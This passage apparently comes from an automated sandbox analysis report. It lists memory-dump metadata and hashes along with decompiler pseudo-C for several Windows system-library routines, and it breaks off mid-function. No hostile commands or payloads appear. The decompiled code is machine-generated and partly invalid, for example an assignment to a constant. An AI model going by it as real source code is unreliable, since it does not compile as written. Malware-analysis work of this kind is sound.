                                        0x053a862c
                                        0x00000000
                                        0x053a873d
                                        0x00000000
                                        0x053a873d
                                        0x053a8737
                                        0x053a850f
                                        0x053a8512
                                        0x00000000
                                        0x053a8512
                                        0x00000000
                                        0x053a84d6

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa20075ac70967a421f8dc5bf8cdc4c0e73506b71d305499acb1f7cc0610717d
                                        • Instruction ID: 6fc529a0c4302b3134b60f195236659315642489948601f5d9e7e8e81a1595ac
                                        • Opcode Fuzzy Hash: fa20075ac70967a421f8dc5bf8cdc4c0e73506b71d305499acb1f7cc0610717d
                                        • Instruction Fuzzy Hash: 34B18B72E04209DFDB19DFA8C984AADFBBAFF88304F14412AE505AB655DB70AC41CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E053C513A(intOrPtr __ecx, void* __edx) {
                                        				signed int _v8;
                                        				signed char _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				signed int _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				char _v63;
                                        				char _v64;
                                        				signed int _v72;
                                        				signed int _v76;
                                        				signed int _v80;
                                        				signed int _v84;
                                        				signed int _v88;
                                        				signed char* _v92;
                                        				signed int _v100;
                                        				signed int _v104;
                                        				char _v105;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t157;
                                        				signed int _t159;
                                        				signed int _t160;
                                        				unsigned int* _t161;
                                        				intOrPtr _t165;
                                        				signed int _t172;
                                        				signed char* _t181;
                                        				intOrPtr _t189;
                                        				intOrPtr* _t200;
                                        				signed int _t202;
                                        				signed int _t203;
                                        				char _t204;
                                        				signed int _t207;
                                        				signed int _t208;
                                        				void* _t209;
                                        				intOrPtr _t210;
                                        				signed int _t212;
                                        				signed int _t214;
                                        				signed int _t221;
                                        				signed int _t222;
                                        				signed int _t226;
                                        				intOrPtr* _t232;
                                        				signed int _t233;
                                        				signed int _t234;
                                        				intOrPtr _t237;
                                        				intOrPtr _t238;
                                        				intOrPtr _t240;
                                        				void* _t245;
                                        				signed int _t246;
                                        				signed int _t247;
                                        				void* _t248;
                                        				void* _t251;
                                        				void* _t252;
                                        				signed int _t253;
                                        				signed int _t255;
                                        				signed int _t256;
                                        
                                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                        				_v8 =  *0x548d360 ^ _t255;
                                        				_v32 = _v32 & 0x00000000;
                                        				_t251 = __edx;
                                        				_t237 = __ecx;
                                        				_t212 = 6;
                                        				_t245 =  &_v84;
                                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                        				_v48 = __ecx;
                                        				_v36 = _t207;
                                        				_t157 = memset(_t245, 0, _t212 << 2);
                                        				_t256 = _t255 + 0xc;
                                        				_t246 = _t245 + _t212;
                                        				if(_t207 == 2) {
                                        					_t247 =  *(_t237 + 0x60);
                                        					_t208 =  *(_t237 + 0x64);
                                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                        					_v104 = _t159;
                                        					_v76 = _t159;
                                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                        					_v100 = _t160;
                                        					_v72 = _t160;
                                        					L19:
                                        					_v80 = _t208;
                                        					_v84 = _t247;
                                        					L8:
                                        					_t214 = 0;
                                        					if( *(_t237 + 0x74) > 0) {
                                        						_t82 = _t237 + 0x84; // 0x124
                                        						_t161 = _t82;
                                        						_v92 = _t161;
                                        						while( *_t161 >> 0x1f != 0) {
                                        							_t200 = _v92;
                                        							if( *_t200 == 0x80000000) {
                                        								break;
                                        							}
                                        							_t214 = _t214 + 1;
                                        							_t161 = _t200 + 0x10;
                                        							_v92 = _t161;
                                        							if(_t214 <  *(_t237 + 0x74)) {
                                        								continue;
                                        							}
                                        							goto L9;
                                        						}
                                        						_v88 = _t214 << 4;
                                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                        						_t165 = 0;
                                        						asm("adc eax, [ecx+edx+0x7c]");
                                        						_v24 = _t165;
                                        						_v28 = _v40;
                                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                        						_t221 = _v40;
                                        						_v16 =  *_v92;
                                        						_v32 =  &_v28;
                                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                        							goto L9;
                                        						}
                                        						_t240 = _v48;
                                        						if( *_v92 != 0x80000000) {
                                        							goto L9;
                                        						}
                                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                        						_t226 = 0;
                                        						_t181 = _t251 + 0x66;
                                        						_v88 = 0;
                                        						_v92 = _t181;
                                        						do {
                                        							if( *((char*)(_t181 - 2)) == 0) {
                                        								goto L31;
                                        							}
                                        							_t226 = _v88;
                                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                        								_t181 = E053DD0F0(1, _t226 + 0x20, 0);
                                        								_t226 = _v40;
                                        								 *(_t226 + 8) = _t181;
                                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                        								L34:
                                        								if(_v44 == 0) {
                                        									goto L9;
                                        								}
                                        								_t210 = _v44;
                                        								_t127 = _t210 + 0x1c; // 0x1c
                                        								_t249 = _t127;
                                        								E053B2280(_t181, _t127);
                                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                        									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                        								}
                                        								_t189 = L053B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                        								if(_t189 != 0) {
                                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                        									 *_t232 = _t232 + 0x10;
                                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                        									E053DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                        									_t256 = _t256 + 0xc;
                                        								}
                                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                        								E053AFFB0(_t210, _t249, _t249);
                                        								_t222 = _v76;
                                        								_t172 = _v80;
                                        								_t208 = _v84;
                                        								_t247 = _v88;
                                        								L10:
                                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                        								_v44 = _t238;
                                        								if(_t238 != 0) {
                                        									 *0x548b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                        									_v44();
                                        								}
                                        								_pop(_t248);
                                        								_pop(_t252);
                                        								_pop(_t209);
                                        								return E053DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                        							}
                                        							_t181 = _v92;
                                        							L31:
                                        							_t226 = _t226 + 1;
                                        							_t181 =  &(_t181[0x18]);
                                        							_v88 = _t226;
                                        							_v92 = _t181;
                                        						} while (_t226 < 4);
                                        						goto L34;
                                        					}
                                        					L9:
                                        					_t172 = _v104;
                                        					_t222 = _v100;
                                        					goto L10;
                                        				}
                                        				_t247 = _t246 | 0xffffffff;
                                        				_t208 = _t247;
                                        				_v84 = _t247;
                                        				_v80 = _t208;
                                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                        					_t233 = _v72;
                                        					_v105 = _v64;
                                        					_t202 = _v76;
                                        				} else {
                                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                        					_v105 = 1;
                                        					if(_v63 <= _t204) {
                                        						_v63 = _t204;
                                        					}
                                        					_t202 = _v76 |  *(_t251 + 0x40);
                                        					_t233 = _v72 |  *(_t251 + 0x44);
                                        					_t247 =  *(_t251 + 0x38);
                                        					_t208 =  *(_t251 + 0x3c);
                                        					_v76 = _t202;
                                        					_v72 = _t233;
                                        					_v84 = _t247;
                                        					_v80 = _t208;
                                        				}
                                        				_v104 = _t202;
                                        				_v100 = _t233;
                                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                                        					_t237 = _v48;
                                        					_v105 = 1;
                                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                        						_t237 = _v48;
                                        					}
                                        					_t203 = _t202 |  *(_t251 + 0xb8);
                                        					_t234 = _t233 |  *(_t251 + 0xbc);
                                        					_t247 = _t247 &  *(_t251 + 0xb0);
                                        					_t208 = _t208 &  *(_t251 + 0xb4);
                                        					_v104 = _t203;
                                        					_v76 = _t203;
                                        					_v100 = _t234;
                                        					_v72 = _t234;
                                        					_v84 = _t247;
                                        					_v80 = _t208;
                                        				}
                                        				if(_v105 == 0) {
                                        					_v36 = _v36 & 0x00000000;
                                        					_t208 = 0;
                                        					_t247 = 0;
                                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                        					goto L19;
                                        				} else {
                                        					_v36 = 1;
                                        					goto L8;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92ae4e9c6c92c90fe10c41c2bf222bbef1c926fb09e1af8c7ddf45c51e094e1a
                                        • Instruction ID: 687f9a6e036ded840952f30c35db5f31b8d2f680e34a3c0a05decb29c4b43425
                                        • Opcode Fuzzy Hash: 92ae4e9c6c92c90fe10c41c2bf222bbef1c926fb09e1af8c7ddf45c51e094e1a
                                        • Instruction Fuzzy Hash: 8AC115756093818FD354CF28C580A5AFBF1BF88304F1449AEF99A8B392D771E945CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E053C03E2(signed int __ecx, signed int __edx) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				signed int _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				intOrPtr _v40;
                                        				signed int _v44;
                                        				signed int _v48;
                                        				char _v52;
                                        				char _v56;
                                        				char _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t56;
                                        				signed int _t58;
                                        				char* _t64;
                                        				intOrPtr _t65;
                                        				signed int _t74;
                                        				signed int _t79;
                                        				char* _t83;
                                        				intOrPtr _t84;
                                        				signed int _t93;
                                        				signed int _t94;
                                        				signed char* _t95;
                                        				signed int _t99;
                                        				signed int _t100;
                                        				signed char* _t101;
                                        				signed int _t105;
                                        				signed int _t119;
                                        				signed int _t120;
                                        				void* _t122;
                                        				signed int _t123;
                                        				signed int _t127;
                                        
                                        				_v8 =  *0x548d360 ^ _t127;
                                        				_t119 = __ecx;
                                        				_t105 = __edx;
                                        				_t118 = 0;
                                        				_v20 = __edx;
                                        				_t120 =  *(__ecx + 0x20);
                                        				if(E053C0548(__ecx, 0) != 0) {
                                        					_t56 = 0xc000022d;
                                        					L23:
                                        					return E053DB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                        				} else {
                                        					_v12 = _v12 | 0xffffffff;
                                        					_t58 = _t120 + 0x24;
                                        					_t109 =  *(_t120 + 0x18);
                                        					_t118 = _t58;
                                        					_v16 = _t58;
                                        					E053AB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                        					_v52 = 0x18;
                                        					_v48 = 0;
                                        					0x840 = 0x40;
                                        					if( *0x5487c1c != 0) {
                                        					}
                                        					_v40 = 0x840;
                                        					_v44 = _t105;
                                        					_v36 = 0;
                                        					_v32 = 0;
                                        					if(E053B7D50() != 0) {
                                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        					} else {
                                        						_t64 = 0x7ffe0384;
                                        					}
                                        					if( *_t64 != 0) {
                                        						_t65 =  *[fs:0x30];
                                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                        							_t100 = E053B7D50();
                                        							__eflags = _t100;
                                        							if(_t100 == 0) {
                                        								_t101 = 0x7ffe0385;
                                        							} else {
                                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        							}
                                        							__eflags =  *_t101 & 0x00000020;
                                        							if(( *_t101 & 0x00000020) != 0) {
                                        								_t118 = _t118 | 0xffffffff;
                                        								_t109 = 0x1485;
                                        								E05417016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                        							}
                                        						}
                                        					}
                                        					_t105 = 0;
                                        					while(1) {
                                        						_push(0x60);
                                        						_push(5);
                                        						_push( &_v64);
                                        						_push( &_v52);
                                        						_push(0x100021);
                                        						_push( &_v12);
                                        						_t122 = E053D9830();
                                        						if(_t122 >= 0) {
                                        							break;
                                        						}
                                        						__eflags = _t122 - 0xc0000034;
                                        						if(_t122 == 0xc0000034) {
                                        							L38:
                                        							_t120 = 0xc0000135;
                                        							break;
                                        						}
                                        						__eflags = _t122 - 0xc000003a;
                                        						if(_t122 == 0xc000003a) {
                                        							goto L38;
                                        						}
                                        						__eflags = _t122 - 0xc0000022;
                                        						if(_t122 != 0xc0000022) {
                                        							break;
                                        						}
                                        						__eflags = _t105;
                                        						if(__eflags != 0) {
                                        							break;
                                        						}
                                        						_t109 = _t119;
                                        						_t99 = E054169A6(_t119, __eflags);
                                        						__eflags = _t99;
                                        						if(_t99 == 0) {
                                        							break;
                                        						}
                                        						_t105 = _t105 + 1;
                                        					}
                                        					if( !_t120 >= 0) {
                                        						L22:
                                        						_t56 = _t120;
                                        						goto L23;
                                        					}
                                        					if( *0x5487c04 != 0) {
                                        						_t118 = _v12;
                                        						_t120 = E0541A7AC(_t119, _t118, _t109);
                                        						__eflags = _t120;
                                        						if(_t120 >= 0) {
                                        							goto L10;
                                        						}
                                        						__eflags =  *0x5487bd8;
                                        						if( *0x5487bd8 != 0) {
                                        							L20:
                                        							if(_v12 != 0xffffffff) {
                                        								_push(_v12);
                                        								E053D95D0();
                                        							}
                                        							goto L22;
                                        						}
                                        					}
                                        					L10:
                                        					_push(_v12);
                                        					_t105 = _t119 + 0xc;
                                        					_push(0x1000000);
                                        					_push(0x10);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0xf);
                                        					_push(_t105);
                                        					_t120 = E053D99A0();
                                        					if(_t120 < 0) {
                                        						__eflags = _t120 - 0xc000047e;
                                        						if(_t120 == 0xc000047e) {
                                        							L51:
                                        							_t74 = E05413540(_t120);
                                        							_t119 = _v16;
                                        							_t120 = _t74;
                                        							L52:
                                        							_t118 = 0x1485;
                                        							E0539B1E1(_t120, 0x1485, 0, _t119);
                                        							goto L20;
                                        						}
                                        						__eflags = _t120 - 0xc000047f;
                                        						if(_t120 == 0xc000047f) {
                                        							goto L51;
                                        						}
                                        						__eflags = _t120 - 0xc0000462;
                                        						if(_t120 == 0xc0000462) {
                                        							goto L51;
                                        						}
                                        						_t119 = _v16;
                                        						__eflags = _t120 - 0xc0000017;
                                        						if(_t120 != 0xc0000017) {
                                        							__eflags = _t120 - 0xc000009a;
                                        							if(_t120 != 0xc000009a) {
                                        								__eflags = _t120 - 0xc000012d;
                                        								if(_t120 != 0xc000012d) {
                                        									_v28 = _t119;
                                        									_push( &_v56);
                                        									_push(1);
                                        									_v24 = _t120;
                                        									_push( &_v28);
                                        									_push(1);
                                        									_push(2);
                                        									_push(0xc000007b);
                                        									_t79 = E053DAAF0();
                                        									__eflags = _t79;
                                        									if(_t79 >= 0) {
                                        										__eflags =  *0x5488474 - 3;
                                        										if( *0x5488474 != 3) {
                                        											 *0x54879dc =  *0x54879dc + 1;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        						goto L52;
                                        					}
                                        					if(E053B7D50() != 0) {
                                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        					} else {
                                        						_t83 = 0x7ffe0384;
                                        					}
                                        					if( *_t83 != 0) {
                                        						_t84 =  *[fs:0x30];
                                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                        							_t94 = E053B7D50();
                                        							__eflags = _t94;
                                        							if(_t94 == 0) {
                                        								_t95 = 0x7ffe0385;
                                        							} else {
                                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        							}
                                        							__eflags =  *_t95 & 0x00000020;
                                        							if(( *_t95 & 0x00000020) != 0) {
                                        								E05417016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                        							}
                                        						}
                                        					}
                                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                        						if( *0x5488708 != 0) {
                                        							_t118 =  *0x7ffe0330;
                                        							_t123 =  *0x5487b00; // 0x0
                                        							asm("ror esi, cl");
                                        							 *0x548b1e0(_v12, _v20, 0x20);
                                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                        							asm("sbb esi, esi");
                                        							_t120 =  ~_t50 & _t93;
                                        						} else {
                                        							_t120 = 0;
                                        						}
                                        					}
                                        					if( !_t120 >= 0) {
                                        						L19:
                                        						_push( *_t105);
                                        						E053D95D0();
                                        						 *_t105 =  *_t105 & 0x00000000;
                                        						goto L20;
                                        					}
                                        					_t120 = E053A7F65(_t119);
                                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                        						__eflags = _t120;
                                        						if(_t120 < 0) {
                                        							goto L19;
                                        						}
                                        						 *(_t119 + 0x64) = _v12;
                                        						goto L22;
                                        					}
                                        					goto L19;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9afc9b729cd6fbe32bd66800317f253f1b26c75dbe300def46ede82a12e000b9
                                        • Instruction ID: a44904ef3f36afbb0a65bad1d3f8930202665e5809459f33a856aa802bfaefc5
                                        • Opcode Fuzzy Hash: 9afc9b729cd6fbe32bd66800317f253f1b26c75dbe300def46ede82a12e000b9
                                        • Instruction Fuzzy Hash: A791E531E08254DBEF259B68C858BFE7BA6FF01764F1502EAEA11A72D0D7749D00C791
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E0539C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                        				signed int _v8;
                                        				char _v1036;
                                        				signed int _v1040;
                                        				char _v1048;
                                        				signed int _v1052;
                                        				signed char _v1056;
                                        				void* _v1058;
                                        				char _v1060;
                                        				signed int _v1064;
                                        				void* _v1068;
                                        				intOrPtr _v1072;
                                        				void* _v1084;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t70;
                                        				intOrPtr _t72;
                                        				signed int _t74;
                                        				intOrPtr _t77;
                                        				signed int _t78;
                                        				signed int _t81;
                                        				void* _t101;
                                        				signed int _t102;
                                        				signed int _t107;
                                        				signed int _t109;
                                        				signed int _t110;
                                        				signed char _t111;
                                        				signed int _t112;
                                        				signed int _t113;
                                        				signed int _t114;
                                        				intOrPtr _t116;
                                        				void* _t117;
                                        				char _t118;
                                        				void* _t120;
                                        				char _t121;
                                        				signed int _t122;
                                        				signed int _t123;
                                        				signed int _t125;
                                        
                                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                        				_v8 =  *0x548d360 ^ _t125;
                                        				_t116 = _a4;
                                        				_v1056 = _a16;
                                        				_v1040 = _a24;
                                        				if(E053A6D30( &_v1048, _a8) < 0) {
                                        					L4:
                                        					_pop(_t117);
                                        					_pop(_t120);
                                        					_pop(_t101);
                                        					return E053DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                        				}
                                        				_t70 = _a20;
                                        				if(_t70 >= 0x3f4) {
                                        					_t121 = _t70 + 0xc;
                                        					L19:
                                        					_t107 =  *( *[fs:0x30] + 0x18);
                                        					__eflags = _t107;
                                        					if(_t107 == 0) {
                                        						L60:
                                        						_t68 = 0xc0000017;
                                        						goto L4;
                                        					}
                                        					_t72 =  *0x5487b9c; // 0x0
                                        					_t74 = L053B4620(_t107, _t107, _t72 + 0x180000, _t121);
                                        					_v1064 = _t74;
                                        					__eflags = _t74;
                                        					if(_t74 == 0) {
                                        						goto L60;
                                        					}
                                        					_t102 = _t74;
                                        					_push( &_v1060);
                                        					_push(_t121);
                                        					_push(_t74);
                                        					_push(2);
                                        					_push( &_v1048);
                                        					_push(_t116);
                                        					_t122 = E053D9650();
                                        					__eflags = _t122;
                                        					if(_t122 >= 0) {
                                        						L7:
                                        						_t114 = _a12;
                                        						__eflags = _t114;
                                        						if(_t114 != 0) {
                                        							_t77 = _a20;
                                        							L26:
                                        							_t109 =  *(_t102 + 4);
                                        							__eflags = _t109 - 3;
                                        							if(_t109 == 3) {
                                        								L55:
                                        								__eflags = _t114 - _t109;
                                        								if(_t114 != _t109) {
                                        									L59:
                                        									_t122 = 0xc0000024;
                                        									L15:
                                        									_t78 = _v1052;
                                        									__eflags = _t78;
                                        									if(_t78 != 0) {
                                        										L053B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                        									}
                                        									_t68 = _t122;
                                        									goto L4;
                                        								}
                                        								_t110 = _v1056;
                                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                                        								_v1060 = _t118;
                                        								__eflags = _t110;
                                        								if(_t110 == 0) {
                                        									L10:
                                        									_t122 = 0x80000005;
                                        									L11:
                                        									_t81 = _v1040;
                                        									__eflags = _t81;
                                        									if(_t81 == 0) {
                                        										goto L15;
                                        									}
                                        									__eflags = _t122;
                                        									if(_t122 >= 0) {
                                        										L14:
                                        										 *_t81 = _t118;
                                        										goto L15;
                                        									}
                                        									__eflags = _t122 - 0x80000005;
                                        									if(_t122 != 0x80000005) {
                                        										goto L15;
                                        									}
                                        									goto L14;
                                        								}
                                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                        									goto L10;
                                        								}
                                        								_push( *((intOrPtr*)(_t102 + 8)));
                                        								_t59 = _t102 + 0xc; // 0xc
                                        								_push(_t110);
                                        								L54:
                                        								E053DF3E0();
                                        								_t125 = _t125 + 0xc;
                                        								goto L11;
                                        							}
                                        							__eflags = _t109 - 7;
                                        							if(_t109 == 7) {
                                        								goto L55;
                                        							}
                                        							_t118 = 4;
                                        							__eflags = _t109 - _t118;
                                        							if(_t109 != _t118) {
                                        								__eflags = _t109 - 0xb;
                                        								if(_t109 != 0xb) {
                                        									__eflags = _t109 - 1;
                                        									if(_t109 == 1) {
                                        										__eflags = _t114 - _t118;
                                        										if(_t114 != _t118) {
                                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                                        											_v1060 = _t118;
                                        											__eflags = _t118 - _t77;
                                        											if(_t118 > _t77) {
                                        												goto L10;
                                        											}
                                        											_push(_t118);
                                        											_t56 = _t102 + 0xc; // 0xc
                                        											_push(_v1056);
                                        											goto L54;
                                        										}
                                        										__eflags = _t77 - _t118;
                                        										if(_t77 != _t118) {
                                        											L34:
                                        											_t122 = 0xc0000004;
                                        											goto L15;
                                        										}
                                        										_t111 = _v1056;
                                        										__eflags = _t111 & 0x00000003;
                                        										if((_t111 & 0x00000003) == 0) {
                                        											_v1060 = _t118;
                                        											__eflags = _t111;
                                        											if(__eflags == 0) {
                                        												goto L10;
                                        											}
                                        											_t42 = _t102 + 0xc; // 0xc
                                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                        											_push(_t111);
                                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                        											_push(0);
                                        											_push( &_v1048);
                                        											_t122 = E053D13C0(_t102, _t118, _t122, __eflags);
                                        											L44:
                                        											_t118 = _v1072;
                                        											goto L11;
                                        										}
                                        										_t122 = 0x80000002;
                                        										goto L15;
                                        									}
                                        									_t122 = 0xc0000024;
                                        									goto L44;
                                        								}
                                        								__eflags = _t114 - _t109;
                                        								if(_t114 != _t109) {
                                        									goto L59;
                                        								}
                                        								_t118 = 8;
                                        								__eflags = _t77 - _t118;
                                        								if(_t77 != _t118) {
                                        									goto L34;
                                        								}
                                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                        									goto L34;
                                        								}
                                        								_t112 = _v1056;
                                        								_v1060 = _t118;
                                        								__eflags = _t112;
                                        								if(_t112 == 0) {
                                        									goto L10;
                                        								}
                                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                        								goto L11;
                                        							}
                                        							__eflags = _t114 - _t118;
                                        							if(_t114 != _t118) {
                                        								goto L59;
                                        							}
                                        							__eflags = _t77 - _t118;
                                        							if(_t77 != _t118) {
                                        								goto L34;
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                        								goto L34;
                                        							}
                                        							_t113 = _v1056;
                                        							_v1060 = _t118;
                                        							__eflags = _t113;
                                        							if(_t113 == 0) {
                                        								goto L10;
                                        							}
                                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                        							goto L11;
                                        						}
                                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                                        						__eflags = _t118 - _a20;
                                        						if(_t118 <= _a20) {
                                        							_t114 =  *(_t102 + 4);
                                        							_t77 = _t118;
                                        							goto L26;
                                        						}
                                        						_v1060 = _t118;
                                        						goto L10;
                                        					}
                                        					__eflags = _t122 - 0x80000005;
                                        					if(_t122 != 0x80000005) {
                                        						goto L15;
                                        					}
                                        					L053B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                        					L18:
                                        					_t121 = _v1060;
                                        					goto L19;
                                        				}
                                        				_push( &_v1060);
                                        				_push(0x400);
                                        				_t102 =  &_v1036;
                                        				_push(_t102);
                                        				_push(2);
                                        				_push( &_v1048);
                                        				_push(_t116);
                                        				_t122 = E053D9650();
                                        				if(_t122 >= 0) {
                                        					__eflags = 0;
                                        					_v1052 = 0;
                                        					goto L7;
                                        				}
                                        				if(_t122 == 0x80000005) {
                                        					goto L18;
                                        				}
                                        				goto L4;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: efb28757508a339296a2b4e26b4147d8b9260e9f696ccf74dd92aab7f2abcf56
                                        • Instruction ID: 1b6dfc1cd43d9a55765515360f3acdfce60e24acd786e42e4a350828eb275d58
                                        • Opcode Fuzzy Hash: efb28757508a339296a2b4e26b4147d8b9260e9f696ccf74dd92aab7f2abcf56
                                        • Instruction Fuzzy Hash: D4817D756082459BDB25DE14C880EBBB3AAFB84354F24586BED459B381D330ED41CBA3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 39%
                                        			E0542B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                        				char _v8;
                                        				signed int _v12;
                                        				signed int _t80;
                                        				signed int _t83;
                                        				intOrPtr _t89;
                                        				signed int _t92;
                                        				signed char _t106;
                                        				signed int* _t107;
                                        				intOrPtr _t108;
                                        				intOrPtr _t109;
                                        				signed int _t114;
                                        				void* _t115;
                                        				void* _t117;
                                        				void* _t119;
                                        				void* _t122;
                                        				signed int _t123;
                                        				signed int* _t124;
                                        
                                        				_t106 = _a12;
                                        				if((_t106 & 0xfffffffc) != 0) {
                                        					return 0xc000000d;
                                        				}
                                        				if((_t106 & 0x00000002) != 0) {
                                        					_t106 = _t106 | 0x00000001;
                                        				}
                                        				_t109 =  *0x5487b9c; // 0x0
